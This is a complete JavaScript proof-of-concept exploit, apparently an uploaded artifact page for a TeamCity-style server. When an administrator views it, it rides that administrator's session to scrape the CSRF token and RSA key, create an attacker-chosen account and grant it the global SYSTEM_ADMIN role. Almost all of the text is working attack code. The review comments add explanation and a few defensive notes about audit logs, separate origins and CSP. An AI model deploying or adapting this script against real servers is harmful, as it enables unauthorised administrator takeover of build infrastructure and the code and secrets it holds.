<script>
// Attacker-chosen values for the account the script further down creates.
// These are PoC placeholders, not real credentials. Note they are assigned
// without var/let/const, so they become implicit globals of the page.
username = "my_new_username";
email = "user@email.email"
password = "my_new_password"
// Empty namespace; presumably filled in with BS.Crypto by the /js/crypt/*.js
// scripts loaded next (encryptData below relies on BS.Crypto existing).
var BS = {};
</script>
<script type="text/javascript" src="/js/crypt/jsbn.js"></script>
<script type="text/javascript" src="/js/crypt/prng4.js"></script>
<script type="text/javascript" src="/js/crypt/rng.js"></script>
<script type="text/javascript" src="/js/crypt/rsa.js"></script>
<script>
function encryptData(data, publicKey) {
  // Seed the library PRNG from the clock, then RSA-encrypt `data` under the
  // modulus `publicKey` with exponent "10001" (presumably hex 0x10001, as
  // jsbn-style setPublic expects — confirm against /js/crypt/rsa.js).
  // Returns whatever rsa.encrypt() yields; the caller sends it as-is.
  BS.Crypto.rng_seed_time();
  const key = new BS.Crypto.RSAKey();
  key.setPublic(publicKey, "10001");
  return key.encrypt(data);
}
function get_regexp(regexp, data) {
  // Run `regexp` once against `data` and return its first capture group.
  // NOTE(review): exec() yields null when nothing matches, so this throws a
  // TypeError in that case rather than returning undefined; callers here
  // assume the markup field is always present. The /g flag makes exec()
  // stateful via lastIndex, but every caller builds a fresh regex literal.
  const found = regexp.exec(data);
  return found[1];
}
// Step 1: fetch the admin "create user" form synchronously. The XHR is
// same-origin, so the browser attaches the victim's session cookies; the
// script itself never handles credentials.
var createUser = new XMLHttpRequest();
createUser.open("GET", "/admin/createUser.html", false);
createUser.send();
// Scrape the CSRF token and the server's RSA public key out of the form
// markup. get_regexp throws a TypeError if either field is missing.
var csrftoken = get_regexp(/tc-csrf-token" value="([^"]*?)"/g, createUser.responseText);
var publickey = get_regexp(/name="publicKey" value="([^"]*?)"/g, createUser.responseText);
// The form expects the password RSA-encrypted under that key, not plaintext.
var encrypted_password = encryptData(password, publickey);
// Step 2: submit the form with administrator=true plus the scraped token.
// escape() is a legacy encoder (left unchanged: it does not percent-encode
// '+', '/', '@', '*', '_', '-', '.'); "Create+User" is sent as a literal.
var params = "_administrator=true&administrator=true&username1="+escape(username)+"&name="+escape(username)+"&email="+escape(email)+"&publicKey="+escape(publickey)+"&_createMoreUsers=&submitCreateUser=Create+User&tc-csrf-token="+escape(csrftoken)+"&encryptedPassword1="+escape(encrypted_password)+"&encryptedRetypedPassword="+escape(encrypted_password);
var createUserPost = new XMLHttpRequest();
createUserPost.open("POST", "/admin/createUserSubmit.html", false);
createUserPost.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
createUserPost.send(params);
// Step 3: list users and pull the numeric userId out of the edit link whose
// anchor text is the username chosen above. `username` is interpolated
// unescaped into the pattern, so it must not contain regex metacharacters.
var listUsers = new XMLHttpRequest();
listUsers.open("GET", "/admin/admin.html?item=users", false);
listUsers.send();
var userid = get_regexp(new RegExp('admin\/editUser.html.*?userId=([0-9]+)[^"]*">'+username+'<', "g"), listUsers.responseText);
// Step 4: assign the global SYSTEM_ADMIN role to that user. `params` is
// re-declared with var here, which sloppy-mode scripts allow.
var params = "-ufd-teamcity-ui-role=System+administrator&role=SYSTEM_ADMIN&roleScope=global&_replaceRoles=&assignRoles=Assign&tc-csrf-token="+escape(csrftoken)+"&rolesHolderId="+escape(userid)
var addRole = new XMLHttpRequest();
addRole.open("POST", "/admin/action.html", false);
addRole.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
addRole.send(params);
// NOTE(review): the whole chain is four authenticated, same-origin requests
// made with the viewer's cookies, which is why script execution in the
// artifact viewer amounts to admin takeover. Defensively, the sequence
// createUser.html -> createUserSubmit.html -> admin.html?item=users ->
// action.html from one session within seconds is a reasonable audit-log
// signal; serving user-uploaded artifacts from a separate origin or under
// a restrictive CSP would break the chain at step 1.
</script>